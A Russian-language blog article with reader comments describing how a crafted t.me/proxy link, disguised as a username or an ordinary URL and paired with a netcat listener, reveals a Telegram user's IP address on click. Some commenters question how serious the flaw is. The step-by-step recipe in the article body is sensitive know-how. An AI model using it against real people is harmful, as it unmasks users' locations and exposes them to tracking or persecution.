В телеграмме есть способ раскрыть IP собеседника в 1 клик, не скидывая ему никаких файлов, картинок и даже не заставляю его переходить по сомнительным ссылкам.
Телеграм даже не предупреждает о том, что вы переходите по какой-то странной ссылке.
А как?
Информация в статье создана для информативных целей, если вы будете использовать информацию из статьи вас набутылят забанят и заставят извиняться
Это одна из множества узявимостей телеги.
Речь про 1-click уязвимость, которая позволяет узнать IP собеседника , если он нажмет на username, ссылку, текст в обход всех прокси...
Оно работает на IOS и Android еще с 2023 года
Для схемы нужно:
Открыть прослушивание любого порта на вашем сервере. Например, через netcat: nc -lvnp <ваш_порт> 2. Подставить в ссылку вида https://t.me/proxy?server=8.8.8.8&port=1337 (тут данные
вашегосервера) 3. Вставить эту ссылку под видом обычной, например: @durov (https://t.me/proxy?server=8.8.8.8&port=1337) или https://google.com (https://t.me/proxy?server=8.8.8.8&port=1337)Подставить в ссылку вида https://t.me/proxy?server=8.8.8.8&port=1337 (тут данные
вашегосервера)Вставить эту ссылку под видом обычной, например: @durov (https://t.me/proxy?server=8.8.8.8&port=1337) или https://google.com (https://t.me/proxy?server=8.8.8.8&port=1337)
Итого что у нас выходит?
При попытке перейти на такую ссылку Telegram сразу отправит пакет на сервер для проверки работоспособности прокси, телеграм нас никак об этом не предупреждает
и мы в один клик сливаем свое местоположение каком-то типу с улицы.
Телеграм умеет защищаться от такого! Да ... умеет же...?
Если вам написал какой-то новый аккаунт с ссылкой в сообщении, то она не будет кликабельна. Казалось бы, это защищает нас от случайного клика, но на деле это значит, что пару часов прогрева + наличие белого акка с хорошей историей... и все, ссылка снова становится кликабельной.
Вот такие пироги...
Почему это происходит?
На Android и iOS клиентах включен автопинг прокси до добавления, а во всех клиентах нет предупреждения при нажатии, если ссылка внутренняя. А прокси ссылка тоже считается внутреней (http://t.me/proxy), поэтому при нажатии на ссылку ваш IP автоматически раскроется.
То есть, мы не вставляем никаких левых фишинговых ссылок, мы бувавльно вставляем линк на сам телеграмм (http://t.me/proxy?) и его сервис, поэтому никаких предупреждений и сообщений от телеги нет
Например @durov, (https://t.me/proxy?server=1.1.1.1&port=53) https://t.me/femidasearch (https://t.me/proxy?server=1.1.1.1&port=53), (https://t.me/durov) https://google.com (https://t.me/proxy?server=1.1.1.1&port=53) и т. д.
Запускаете mtproxy, добавляете ссылку на ваш прокси поверх ссылки Telegram или любого другого текста, ждете, смотрите логи подключений IP и все...
Данные принадлежат кому угодно, но не нам :-(
Все ваши УДАЛЕННЫЕ сообщения в Telegram хранятся на устройстве... их можно восстановить
Комментарии (75)
cs0ip
05.01.2026 15:42Так это кликнуть ещё надо? Или телега сама пройдет по ссылке и без клика?
altervision
05.01.2026 15:42Нужно кликнуть и подтвердить добавление прокси. Там будет здоровенная плашка с информацией о прокси, предупреждение "Этот прокси может показывать рекламу" и большая кнопка "Подключить прокси". Чтобы спокойно по такому прокликать и не заметить, нужно быть достаточно тупым. Считать это уязвимостью, учитывая тонну выдаваемых предупреждений - глупо.
ETO1XPEHb
05.01.2026 15:42А вы знаете что переход по любой ссылке раскрывает ваш ипишник, достаточно просто прикрутить к ней уникальный идентификатор и вуаля. Да и знание IP не особо даёт много в эпоху динамических IP
chiral
05.01.2026 15:42Это так, но тут сказано, что это делается в обход всех прокси. А если ты откроешь из браузера, то (в современных реалиях) увидят только твоей зарубежный сервер.
s5384
05.01.2026 15:42Не совсем понимаю, про какой прокси речь. Если про те, которые в телеге, то через них и не должны пинговаться другие прокси. Если речь уже про полноценный впн, то в обход него без рут прав ты не выйдешь, если не указаны иные правила маршрутизации
MnsDev
05.01.2026 15:42Если вы просто отправите ссылку, телеграм перед этим попросит вашего подтверждения и покажет основной ресурс куда попадает человек, без форматирования
Допустим вы отправили href ссылку с google.com, ТГ покажет что это neobmanytebyatochno.org
А тут буквально href ссылка вида ТГ канала и при нажатии ваш айпи адрес моментально улетает злоумышленнику
Germanjon
05.01.2026 15:42Ну почему же? Когда Х стал показывать страну регистрации и последнего входа аккаунта, выяснилось, что многие ура-патриоты разных стран предпочитают быть патриотами с берегов какой-нибудь Испании. У многих подгорело.
CombineSoldier
05.01.2026 15:42Тот самый Х, который у нас заблокирован, и на который можно зайти только с vpn?
dikers
05.01.2026 15:42Так и что даст ip?. Мало у кого он статический . У большинства он вообще серый .
MountainGoat
05.01.2026 15:42Ну можно же определить провайдера, а потом
прийти к нему с ордеромпо прямому доступу к его инфраструктуре посмотреть, кому выдавался этот айпишник.
NAI
05.01.2026 15:42зачем? Дуров же договорился с
РКНкем надо и там и без всех этих сложностей могут видеть кто-что и куда.Помните как телегу блочили пока Дуров пиарил телегу как защищенный месенджер? прокси там всякие включали, а потом как-то внезапно все стало работать нормально
Germanjon
05.01.2026 15:42Ментальные доказательства, что "местный канал с актуальной повесточкой" на самом деле управляется из-за рубежа
DarkLord4563
Круто, ну особо всё равно её поможет